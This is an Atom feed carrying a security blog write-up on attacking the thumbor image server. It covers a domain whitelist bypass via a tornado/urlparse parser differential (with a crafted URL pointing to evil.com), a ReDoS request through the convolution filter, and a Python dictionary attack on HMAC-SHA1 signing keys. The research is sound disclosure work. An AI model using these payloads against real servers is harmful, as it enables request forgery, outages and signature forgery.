<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en"><generator uri="https://jekyllrb.com/" version="4.4.1">Jekyll</generator><link href="https://geraldino2.github.io/feed.xml" rel="self" type="application/atom+xml"/><link href="https://geraldino2.github.io/" rel="alternate" type="text/html" hreflang="en"/><updated>2026-01-31T15:38:48+00:00</updated><id>https://geraldino2.github.io/feed.xml</id><title type="html">blank</title><subtitle>apolo2&apos;s personal blog</subtitle><entry><title type="html">Attacking thumbor</title><link href="https://geraldino2.github.io/blog/2026/attacking-thumbor/" rel="alternate" type="text/html" title="Attacking thumbor"/><published>2026-01-29T00:00:00+00:00</published><updated>2026-01-29T00:00:00+00:00</updated><id>https://geraldino2.github.io/blog/2026/attacking-thumbor</id><content type="html" xml:base="https://geraldino2.github.io/blog/2026/attacking-thumbor/"><![CDATA[<p><a href="https://github.com/thumbor/thumbor">thumbor</a> is an open-source image processing server, similar to <a href="https://developers.cloudflare.com/images/">Cloudflare Images</a> or <a href="https://imgproxy.net/">imgproxy</a>.</p> <p>The easiest way to have thumbor process an image is through unsafe URLs, <a href="https://github.com/thumbor/thumbor/blob/f83495a819d5d417317fc3dbf7a4d10872b4f15f/thumbor/config.py#L385-L390">enabled by default</a>, in the format <a href="http://thumbor-server/unsafe/300x300/path/to/image.jpg">http://thumbor-server/unsafe/300x300/smart/path/to/image.jpg</a>. 
An obvious problem is that attackers can manipulate the options passed to the server; thumbor frames this security issue as a possibility of <a href="https://github.com/thumbor/thumbor/blob/f83495a819d5d417317fc3dbf7a4d10872b4f15f/docs/security.rst">DoS through spam</a> and recommends HMAC-signed URLs as a solution.</p> <p>This blog post covers:</p> <ul> <li>Domain whitelist bypass via a parser differential between <code class="language-plaintext highlighter-rouge">tornado</code> and <code class="language-plaintext highlighter-rouge">urlparse</code>;</li> <li>Single-request denial of service through ReDoS;</li> <li>Attacking the HMAC security key via brute force;</li> <li>Some other random stuff.</li> </ul> <h2 id="domain-whitelist-bypass">Domain whitelist bypass</h2> <p>thumbor provides several configuration options to restrict what the server can do, such as <code class="language-plaintext highlighter-rouge">MAX_WIDTH</code> or <code class="language-plaintext highlighter-rouge">ALLOWED_SOURCES</code>; the latter defines which FQDNs thumbor can download images from.</p> <p>The call stack for processing an external image is quite long, but it starts at <code class="language-plaintext highlighter-rouge">handlers/imaging.py:get</code>, and the most important download-related methods are in <code class="language-plaintext highlighter-rouge">loaders/http_loader.py</code>. <code class="language-plaintext highlighter-rouge">loaders/http_loader.py:validate</code> checks whether the given URL is within the whitelist defined by <code class="language-plaintext highlighter-rouge">ALLOWED_SOURCES</code>, and <code class="language-plaintext highlighter-rouge">loaders/http_loader.py:load</code> is responsible for the download itself. Heavily simplified, the code for both functions looks like this:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="n">re</span>
<span class="kn">import</span> <span class="n">tornado.httpclient</span>
<span class="kn">from</span> <span class="n">urllib.parse</span> <span class="kn">import</span> <span class="n">urlparse</span>

<span class="k">def</span> <span class="nf">validate</span><span class="p">(</span><span class="n">context</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span>
    <span class="n">res</span> <span class="o">=</span> <span class="nf">urlparse</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">pattern</span> <span class="ow">in</span> <span class="n">context</span><span class="p">.</span><span class="n">config</span><span class="p">.</span><span class="n">ALLOWED_SOURCES</span><span class="p">:</span>
        <span class="n">pattern</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"</span><span class="s">^</span><span class="si">{</span><span class="n">pattern</span><span class="si">}</span><span class="s">$</span><span class="sh">"</span>
        <span class="n">match</span> <span class="o">=</span> <span class="n">res</span><span class="p">.</span><span class="n">hostname</span>
        <span class="k">if</span> <span class="n">re</span><span class="p">.</span><span class="nf">match</span><span class="p">(</span><span class="n">pattern</span><span class="p">,</span> <span class="n">match</span><span class="p">):</span>
            <span class="k">return</span> <span class="bp">True</span>
    <span class="k">return</span> <span class="bp">False</span>


<span class="k">async</span> <span class="k">def</span> <span class="nf">load</span><span class="p">(</span><span class="n">url</span><span class="p">):</span>
    <span class="k">return</span> <span class="n">tornado</span><span class="p">.</span><span class="n">httpclient</span><span class="p">.</span><span class="nc">HTTPRequest</span><span class="p">(</span><span class="n">url</span><span class="o">=</span><span class="n">url</span><span class="p">)</span>
</code></pre></div></div> <p><code class="language-plaintext highlighter-rouge">ALLOWED_SOURCES</code> is a list of FQDN patterns; each one is anchored and matched as a regular expression. <code class="language-plaintext highlighter-rouge">validate</code> uses <code class="language-plaintext highlighter-rouge">urllib</code> to extract the hostname from a URL and matches it against each entry of the list. If the validation succeeds, the URL is passed to <code class="language-plaintext highlighter-rouge">load</code>. There’s one problem with this approach: <code class="language-plaintext highlighter-rouge">thumbor</code> has no guarantee that <code class="language-plaintext highlighter-rouge">tornado</code> parses the URL the same way <code class="language-plaintext highlighter-rouge">validate</code> does.</p> <p>Digging into <code class="language-plaintext highlighter-rouge">tornado</code>, one can see that it does use <code class="language-plaintext highlighter-rouge">urllib</code>, but it also implements its own logic to separate hosts from ports. A simplified version of the code is provided below:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="n">re</span>
<span class="kn">from</span> <span class="n">urllib.parse</span> <span class="kn">import</span> <span class="n">urlsplit</span>

<span class="k">def</span> <span class="nf">parse_url_host_port</span><span class="p">(</span><span class="n">url</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">tuple</span><span class="p">[</span><span class="nb">str</span><span class="p">,</span> <span class="nb">int</span> <span class="o">|</span> <span class="bp">None</span><span class="p">]:</span>
    <span class="n">netloc</span> <span class="o">=</span> <span class="nf">urlsplit</span><span class="p">(</span><span class="n">url</span><span class="p">).</span><span class="n">netloc</span>
    <span class="n">_netloc_re</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="nf">compile</span><span class="p">(</span><span class="sa">r</span><span class="sh">"</span><span class="s">^(.+):(\d+)$</span><span class="sh">"</span><span class="p">)</span>
    <span class="n">match</span> <span class="o">=</span> <span class="n">_netloc_re</span><span class="p">.</span><span class="nf">match</span><span class="p">(</span><span class="n">netloc</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">match</span><span class="p">:</span>
        <span class="n">host</span> <span class="o">=</span> <span class="n">match</span><span class="p">.</span><span class="nf">group</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
        <span class="n">port</span> <span class="o">=</span> <span class="nf">int</span><span class="p">(</span><span class="n">match</span><span class="p">.</span><span class="nf">group</span><span class="p">(</span><span class="mi">2</span><span class="p">))</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">host</span> <span class="o">=</span> <span class="n">netloc</span>
        <span class="n">port</span> <span class="o">=</span> <span class="bp">None</span>
    <span class="k">return</span> <span class="n">host</span><span class="p">,</span> <span class="n">port</span>
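
# Illustrative sketch, not thumbor or tornado code. Assumption: the helper
# names and the crafted URL are hypothetical. It compares the hostname that
# urlparse reports (what validate checks) with the host produced by the same
# split logic as parse_url_host_port above.
import re
from urllib.parse import urlparse, urlsplit

NETLOC_RE = re.compile(r"^(.+):(\d+)$")


def host_for_validation(url):
    # urlparse splits the netloc at the first ":" and only checks the port
    # when .port is read, so .hostname works even with a non-numeric port.
    return urlparse(url).hostname


def host_for_connection(url):
    # Without a numeric port the regex does not match, and the whole netloc
    # is kept as the host.
    netloc = urlsplit(url).netloc
    match = NETLOC_RE.match(netloc)
    return match.group(1) if match else netloc


crafted = "http://allowed-domain.com:.evil.com/x.png"
print(host_for_validation(crafted))  # the value a whitelist check would see
print(host_for_connection(crafted))  # the value handed on for the connection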
</code></pre></div></div> <p>Note that <code class="language-plaintext highlighter-rouge">tornado</code> only splits off a port when the part after the last colon is purely numeric, while <code class="language-plaintext highlighter-rouge">urlparse</code> splits the netloc at the first colon and doesn’t validate the port unless its <code class="language-plaintext highlighter-rouge">port</code> attribute is read. A URL such as <code class="language-plaintext highlighter-rouge">http://allowed-domain.com:.evil.com</code> will be seen by <code class="language-plaintext highlighter-rouge">validate</code> as containing an allowed hostname (<code class="language-plaintext highlighter-rouge">allowed-domain.com</code> as a hostname and <code class="language-plaintext highlighter-rouge">.evil.com</code> as a port), but <code class="language-plaintext highlighter-rouge">tornado</code> treats the whole netloc, <code class="language-plaintext highlighter-rouge">allowed-domain.com:.evil.com</code>, as the hostname.</p> <p>Although <code class="language-plaintext highlighter-rouge">allowed-domain.com:.evil.com</code> is technically not a valid FQDN, <code class="language-plaintext highlighter-rouge">tornado</code> uses <code class="language-plaintext highlighter-rouge">socket.getaddrinfo</code> to get the IP address; this function treats <code class="language-plaintext highlighter-rouge">evil.com</code> as the hostname, which bypasses the whitelist.</p> <h2 id="redos">ReDoS</h2> <p>In backtracking engines, regular expressions can take up to exponential time to evaluate, and the excessive use of resources may cause a denial of service (<a href="https://cwe.mitre.org/data/definitions/1333.html">CWE-1333</a>). The <a href="https://blog.cloudflare.com/details-of-the-cloudflare-outage-on-july-2-2019/">Cloudflare outage in 2019</a> is probably the best-known example of that.</p> <p>Besides resizing images, thumbor can also apply filters to them. Filters are parsed with regexes, and several of the built-in filters use patterns that can take polynomial or even exponential time to evaluate. 
An exhaustive list won’t be provided, but the <code class="language-plaintext highlighter-rouge">convolution</code> filter is an example: <code class="language-plaintext highlighter-rouge">/convolution\((?:\s*((?:[-]?[\d]+\.?[\d]*[;])*(?:[-]?[\d]+\.?[\d]*))\s*)(?:,\s*([\d]+)\s*)(?:,\s*([Tt]rue|[Ff]alse|1|0)\s*)?\)/</code> takes $O(2^n)$ time in the worst case.</p> <p><a href="http://thumbor-server/unsafe/0x0/smart/filters:convolution(-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11)/x.png"><code class="language-plaintext highlighter-rouge">http://thumbor-server/unsafe/0x0/smart/filters:convolution(-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11)/x.png</code></a> causes the call to <code class="language-plaintext highlighter-rouge">re.match</code> at <a href="https://github.com/thumbor/thumbor/blob/f83495a819d5d417317fc3dbf7a4d10872b4f15f/thumbor/filters/__init__.py#L189"><code class="language-plaintext highlighter-rouge">thumbor/thumbor/filters/__init__.py#L189</code></a> to run for so long that the server stalls.</p> <h2 id="brute-force-attack-on-hmac">Brute force attack on HMAC</h2> <p>For some reason, the documentation states that the <code class="language-plaintext highlighter-rouge">SECURITY_KEY</code> for HMAC should be <a href="https://github.com/thumbor/thumbor/blob/f83495a819d5d417317fc3dbf7a4d10872b4f15f/thumbor/thumbor.conf#x:~:text=16%20characters">up to 16 characters</a>. The code, however, doesn’t enforce that limit, and it’s actually better to use longer, more complex keys.</p> <p>Given a URL such as <a href="http://thumbor-server/hash-signature/0x0/smart/x.png"><code class="language-plaintext highlighter-rouge">http://thumbor-server/hash-signature/0x0/smart/x.png</code></a>, the signature is computed over <code class="language-plaintext highlighter-rouge">0x0/smart/x.png</code>. 
Because the default URL signer computes the signature as in the code below, a single HMAC-SHA1 over the signed part of the URL, weak keys are trivial to recover with brute-force or dictionary attacks.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">signature</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span>
    <span class="k">return</span> <span class="n">base64</span><span class="p">.</span><span class="nf">urlsafe_b64encode</span><span class="p">(</span>
        <span class="n">hmac</span><span class="p">.</span><span class="nf">new</span><span class="p">(</span>
            <span class="n">self</span><span class="p">.</span><span class="n">security_key</span><span class="p">,</span> <span class="nf">text_type</span><span class="p">(</span><span class="n">url</span><span class="p">).</span><span class="nf">encode</span><span class="p">(</span><span class="sh">"</span><span class="s">utf-8</span><span class="sh">"</span><span class="p">),</span> <span class="n">hashlib</span><span class="p">.</span><span class="n">sha1</span>
        <span class="p">).</span><span class="nf">digest</span><span class="p">()</span>
    <span class="p">)</span>
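
# Illustrative sketch, not thumbor code. Assumptions: the key, the wordlist
# and the helper names are hypothetical, and the signature is taken to be the
# urlsafe base64 of an HMAC-SHA1 over the signed path, as in the method above.
import base64
import hashlib
import hmac


def sign(key, path):
    mac = hmac.new(key.encode("utf-8"), path.encode("utf-8"), hashlib.sha1)
    return base64.urlsafe_b64encode(mac.digest()).decode("ascii")


def find_key(observed_signature, path, candidates):
    # Offline dictionary attack: one HMAC computation per candidate key,
    # with no request sent to the server.
    for candidate in candidates:
        if sign(candidate, path) == observed_signature:
            return candidate
    return None


path = "0x0/smart/x.png"
observed = sign("hunter2", path)  # stands in for a signature seen in a URL
wordlist = ["changeme", "thumbor", "hunter2"]
print(find_key(observed, path, wordlist))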
</code></pre></div></div> <h2 id="miscellaneous">Miscellaneous</h2> <ul> <li>The documentation says that it’s possible to define a callback function for JSONP in the configuration file (<code class="language-plaintext highlighter-rouge">META_CALLBACK_NAME</code>). Although not documented, it’s also possible to do it in the URL: <a href="http://thumbor-server/unsafe/meta/0x0/smart/x.png?callback=foobar">http://thumbor-server/unsafe/meta/0x0/smart/x.png?callback=foobar</a>;</li> <li>Uploads can be enabled through the non-default <code class="language-plaintext highlighter-rouge">UPLOAD_ENABLED</code> setting, which is potentially dangerous;</li> <li><code class="language-plaintext highlighter-rouge">USE_BLACKLIST</code> is also a non-default configuration that allows unprivileged users to add URLs to a blacklist. The blacklist is case-sensitive and doesn’t normalize the URL in any way.</li> </ul>]]></content><author><name></name></author><category term="cybersec"/><category term="writeup"/><category term="web"/><category term="server-side"/><category term="parser-differential"/><summary type="html"><![CDATA[parser differential between tornado and urlparse, ReDoS, bruteforce, misconfigurations]]></summary></entry></feed>